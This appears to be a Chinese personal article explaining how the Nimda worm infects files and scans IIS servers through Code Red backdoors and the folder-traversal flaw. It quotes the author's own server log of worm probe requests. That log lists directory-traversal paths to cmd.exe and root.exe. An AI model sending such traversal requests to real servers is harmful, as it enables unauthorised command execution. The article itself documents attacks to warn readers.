尼姆达 Nimda 是 去年 9 月份最猖獗的病毒。根据市公安局公共信息网络安全监察处发布的《采
取紧急措施防治“尼姆达”病毒的通知》,尼姆达病毒具有感染速度快、扩散面广、传播形式
复杂多样等特点。经分析,该病毒可通过电子、共享网络资源、微软 IIS 服务器传播,也可感
染本地文件。感染对象为使用 Windows 操作系统(包括 Windows95/98/ME/NT)的计算机和服务
器,发作时影响计算机运行速度,导致系统瘫痪。简单说来,Nimda 的传染方式有两种:第一
种是本地执行带毒软件,致使本地硬盘和局域网的所有能接触到的执行文件都带上病毒。切断
这种传染方式的方法是不执行可疑的文件,不随便下载,不随便打开 Email 中的附件。相信上
网有一定年纪、有过痛苦教训的网友都能做到这点。第二种传染方式是带病毒的计算机在互联
网上查找存在漏洞的微软的服务器 IIS,找到之后就向这台牺牲品传染。这种方式以前没有得
到足够的重视,于是 Yanbb 就中了毒。
带有 Nimda 病毒的计算机上网之后,随便地查找一个 IP 地址,就向其发送命令察看这个 IP 地
址的主机是不是有漏洞。根据微软提供的资料,Nimda 查询漏洞分两步:第一步,查询这台目
标主机是不是中过红色代码(Read Code)病毒,为如果它曾经感染红色代码而没有清理干净,
Nimda 就会利用红色代码病毒留下的后门来作恶。病毒协同作战,没听说过吧?如果没有找到
红色代码留下的后门,Nimda 第二步查找这台目标主机有没有“服务文件夹交叉漏洞”(Web
Server Folder Traversal)。啊,微软怎么有这么多漏洞啊!自从我安装了个人
(.fadshop.net/myweb.asp?id=squirrel)之后,我查询了一下 IIS 的访问记录,发现了这些
记录:
……
01:07:16 x.x.78.47 GET /scripts/root.exe 404
01:07:21 x.x.78.47 GET /MSADC/root.exe 404
01:07:24 x.x.78.47 GET /c/winnt/system32/cmd.exe 404
01:07:28 x.x.78.47 GET /d/winnt/system32/cmd.exe 404
01:07:39 x.x.78.47 GET /scripts/..\../winnt/system32/cmd.exe 500
01:12:56 x.x.78.47 GET /scripts/root.exe 404
01:12:57 x.x.78.47 GET /MSADC/root.exe 404
01:12:59 x.x.78.47 GET /c/winnt/system32/cmd.exe 404
01:13:00 x.x.78.47 GET /d/winnt/system32/cmd.exe 404
01:13:02 x.x.78.47 GET /scripts/..\../winnt/system32/cmd.exe 500
01:13:02 x.x.78.47 GET /_vti_bin/..\../..\../..\../winnt/system32/cmd.exe 404
01:13:13 x.x.78.47 GET /_mem_bin/..\../..\../..\../winnt/system32/cmd.exe 404
01:13:17 x.x.78.47 GET
/msadc/..\../..\../..\/..?../..?../..?../winnt/system32/cmd.exe 500
01:13:17 x.x.78.47 GET /scripts/..?../winnt/system32/cmd.exe 500
01:13:19 x.x.78.47 GET /scripts/..?../winnt/system32/cmd.exe 404
01:13:20 x.x.78.47 GET /winnt/system32/cmd.exe 404
01:13:25 x.x.78.47 GET /winnt/system32/cmd.exe 404
01:13:29 x.x.78.47 GET /scripts/..\../winnt/system32/cmd.exe 500
01:13:29 x.x.78.47 GET /scripts/..\../winnt/system32/cmd.exe 500
01:13:31 x.x.78.47 GET /scripts/..\../winnt/system32/cmd.exe 500
01:13:33 x.x.78.47 GET /scripts/../../winnt/system32/cmd.exe 500
01:13:58 x.x.176.142 GET /scripts/root.exe 404
01:13:58 x.x.176.142 GET /MSADC/root.exe 404
01:13:59 x.x.176.142 GET /c/winnt/system32/cmd.exe 404
01:13:59 x.x.176.142 GET /d/winnt/system32/cmd.exe 404
01:14:00 x.x.176.142 GET /scripts/..\../winnt/system32/cmd.exe 500
01:14:00 x.x.176.142 GET /_vti_bin/..\../..\../..\../winnt/system32/cmd.exe 404
01:14:10 x.x.176.142 GET /_mem_bin/..\../..\../..\../winnt/system32/cmd.exe 404
01:14:10 x.x.176.142 GET
/msadc/..\../..\../..\/..?../..?../..?../winnt/system32/cmd.exe 500
01:14:12 x.x.176.142 GET /scripts/..?../winnt/system32/cmd.exe 500